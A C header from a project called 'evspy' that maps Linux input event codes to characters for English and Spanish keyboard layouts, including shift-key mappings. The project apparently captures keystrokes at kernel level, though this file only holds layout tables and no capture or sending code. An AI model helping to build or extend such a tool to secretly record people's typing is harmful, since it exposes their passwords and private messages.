aboutsummaryrefslogtreecommitdiff
path: root/maps/maps.h
blob: f4fc8565e420b02be4484b018c420e6f473606bf (plain) (blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
/*
 * ## KEYBOARD LAYOUT MAPS ##
 *
 * Each map is an array where the content of each position is the key value
 * associated with the event code (index). An special/unknown key is represented
 * as a dot ('.'). The dot key itself is registered with its own macro (KEY_DOT).
 *
 * Maps are imported from files named map_XX.h, where XX is the layout code.
 *
 * Each file declares a char array called map, where the content of each
 * position is the key value associated with the event code (index). It also
 * defines a function called init_shiftmap that can register any number of shift
 * keys to be parsed when shift or capslock has been pressed.
 *
 * For example,
 * 		EVS_SHIFT(KEY_7, "/");
 * associates the key of number 7 to the slash character when shift is pressed.
 * Yeah, the character associated is a string: this is because of the hashmap
 * implementation, that maps an integer to a (void *).
 *
 * By the moment, evspy does not support non-ascii characters.
 *
 * Select your map with EVS_KLAY macro in evspy-core.h
 */

#ifndef __EVS_MAPS
#define __EVS_MAPS

#include <linux/input.h>
#include "../khm/khm.h"

#define EVS_SHIFT(KEY, VALUE)	khm_insert(shm, (KEY), (VALUE))

// Shift map
static struct khashmap *shm;

static inline void exit_shiftmap(void)
{
	khm_destroy(shm);
}

// Load the map associated with the given keyboard layout
#ifndef EVS_KLAY
#include "map_es.h"		// default layout
#elif EVS_KLAY == EVS_KLAY_EN
#include "map_en.h"
#elif EVS_KLAY == EVS_KLAY_ES
#include "map_es.h"
#endif	// EVS_KLAY

#endif	// __EVS_MAPS